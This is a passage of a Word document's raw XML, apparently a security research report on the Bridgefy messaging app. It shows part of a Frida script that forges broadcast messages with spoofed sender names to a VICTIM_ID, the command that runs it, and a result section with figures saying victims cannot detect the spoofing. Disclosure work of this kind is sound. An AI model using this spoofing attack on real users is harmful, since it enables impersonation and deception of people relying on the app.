          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"go222"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>not exist) user"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, timestamp);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p4 = payload.$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(VICTIM_ID, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"nebula"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"nebii"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, 4, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>me?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>timestamp);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(responsestr.includes(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Payload"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="2880" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>console.log(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"[+] response1 = " </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="2880" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p1; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//p1 should be changed with p2, p3 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="2880" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>console.log(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"[+]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>response2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>response); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>response;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>frida -l broadcast_attack.js -U </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The victim device receives the spoofed messages and the user has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>way</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>has been spoofed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="74"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="3102"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2448261" cy="3273837"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47" name="Image 47"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="47" name="Image 47"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2448261" cy="3273837"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="103"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Spoofed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>broadcast</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="105"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487603712">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2750921</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>228232</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2724150" cy="1390650"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="48" name="Group 48"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvPr id="48" name="Group 48"/>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2724150" cy="1390650"/>
                          <a:chExt cx="2724150" cy="1390650"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="49" name="Image 49"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId99" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="876300" cy="1390649"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="50" name="Image 50"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId100" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="914400" y="0"/>
                            <a:ext cx="885825" cy="1390649"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="51" name="Image 51"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId101" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1838325" y="0"/>
                            <a:ext cx="885825" cy="1390649"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group style="position:absolute;margin-left:216.608002pt;margin-top:17.971075pt;width:214.5pt;height:109.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15712768;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshapegroup36" coordorigin="4332,359" coordsize="4290,2190">
                <v:shape style="position:absolute;left:4332;top:359;width:1380;height:2190" type="#_x0000_t75" id="docshape37" stroked="false">
                  <v:imagedata r:id="rId99" o:title=""/>
                </v:shape>
                <v:shape style="position:absolute;left:5772;top:359;width:1395;height:2190" type="#_x0000_t75" id="docshape38" stroked="false">
                  <v:imagedata r:id="rId100" o:title=""/>
                </v:shape>
                <v:shape style="position:absolute;left:7227;top:359;width:1395;height:2190" type="#_x0000_t75" id="docshape39" stroked="false">
                  <v:imagedata r:id="rId101" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="84"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Spoofed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note that on iOS devices,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
